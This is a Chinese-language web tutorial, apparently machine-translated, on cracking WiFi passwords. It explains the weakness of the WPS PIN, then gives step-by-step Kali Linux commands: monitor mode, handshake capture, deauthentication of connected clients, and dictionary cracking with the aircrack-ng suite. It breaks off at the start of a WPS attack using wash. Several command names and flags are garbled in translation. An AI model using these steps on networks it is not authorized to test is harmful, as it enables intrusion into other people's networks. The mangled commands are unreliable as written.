專破加密的wifi軟件 破解無線網絡密碼( 三 )


3.pin碼破解WiFi密碼
在早期的無線路由器中 , wps功能是開啟的 。簡單來說 , 這個功能就是為了方便設備連接WiFi而設置了一個8位純數字串 , 不用每次都輸入繁瑣的密碼 ??蛻舳丝梢酝ㄟ^pin碼快速關聯路由器WiFi 。wps的初衷是方便用戶連接WiFi , 但卻成了破解WiFi最有效的手段 , 因為8位純pin碼只有1億種可能的組合 , 而由于最后一位是前7位的校驗和 , 所以只需要猜前7位 , 就只有1000萬種可能的組合可以猜 。而且由于發送pin碼是為了連接WiFi , pin的前四位的錯誤內容和后三位的錯誤信息是不一樣的 , 所以你只需要猜測前四位 , 然后猜測前四位正確后的后三位 , 最后一位校驗和終究是可以自動計算出來的 , 所以實際操作中你最多只需要猜測10000+1000種組合 。通常 , 我們每兩秒鐘嘗試一次pin , 因此理論上 , it WiFi需要長達六個小時來猜測目標路由器的pin , 然后獲得它 。
需要注意的是 , 雖然pin碼破解WiFi被認為是最有效的WiFi破解方式 , 但在實踐中并不容易實現 。第一 , 由于pin碼不安全的問題已經被無線路由器的廠商廣泛重視 , 如今購買的無線路由器的wps功能已經基本取消 。第二 , 在pin的過程中 , 需要不斷的發送pin碼給目的路由器嘗試 , 對方路由器還要返回響應消息 。有時候由于路由器本身的不穩定或者路由器的性能問題 , 路由器在不知不覺中被我們的pin殺死 , 導致猜測無法繼續或者路由器在收到太多錯誤的pin碼后會自動休息一段時間 , 在此期間不會收到pin碼 , 導致對我們pin碼的猜測時間過長且無意義 。
三 。裂解過程實例說明準備工具1.筆記本
2.USB無線網卡(必需)
3 .卡利系統
4.密碼字典
第一種方法【專破加密的wifi軟件 破解無線網絡密碼】暴力破解法
什么是暴力破解?事實上 , 這意味著一個接一個地嘗試密碼 , 直到找到正確的密碼 。
現在wifi一般加密如下:
1.WEP(有線等效加密)-采用WEP64位或128位數據加密 。
2.WPA-PSK[TKIP]-使用預共享密鑰的WI-FI保護訪問 , WPA-PSK標準加密技術和TKIP加密類型 。
3.WPA-PSK[TKIP]+WPA2-PSK[AES]-允許客戶使用WPA-PSK[TKIP]或WPA2-PSK[AES] 。
開始實驗:第一步
輸入kali , 并在終端輸入以下內容
措置懲罰網卡事情規范范式
列出網卡信息

2.第二步
輸入:
airmon-ng啟動wlan0
打開網卡監控

您可以使用ifconfig命令來檢查網卡信息:
命令
您可以看到網卡的名稱已經更改

3.第三步
airodump-ng wlan0mon
掃描wifi信號

在這里 , 我用自己的wifi做實驗 。
第四步
從上圖可以看出
BSSID是50:3A:A0:33:B2:8C頻道(CH)是:2
輸入:
airodump-ng-w freedom-C2-–bssid 50:3A:A0:33:B2:8C WLAN 0 mon–忽略-負一
抓住離合器 。
-c:指定頻道
-w:指定手拿包的存放位置或名稱 , 自由是后面要搶的手拿包的名稱 。
- bssid:指定路由器的MAC 。


第五步
打開另一個終端 , 輸入命令:
airplay-ng-deatu 10-a路由器MAC -c客戶端MAC
WLAN 0 mon –-忽略-負一
使用airplay-ng工具強制斷開連接wifi的設備 , 重新連接路由器抓取數據包 。
–-deatu:指定要發送的反驗證數據包的數量 , 或者-0(阿拉伯數字0)可用于指定反驗證數據包的數量 。
-a:指定路由器的MAC 。
-c:指定客戶端的MAC 。

6.第六步
破解握手包

空氣裂縫-ng -a -w字典自由 。帽子
-a1:指定WEP加密方法
-a2:指定WPA-PSk加密方法
字典:字典的名字
自由-* 。帽子:握手包

這是我的wifi密碼

破解成功靠的是強大的字典和運氣 。
第二種方法第一步
Wash會在WPS打開的情況下掃描網絡
wash -i wlan0mon [-C]


由于周圍沒有開啟WPS功能的wifi , 所以會出現如上圖所示 。這時候先別急 , 因為有些比較隱蔽 , 所以直接來 。
使用之前的命令掃描wifi:
airodump-ng wlan0mon

如果看到邊肖圈出來的MAC , 選擇PWR絕對值小于70的wifi破解 。
2.第二步

推薦閱讀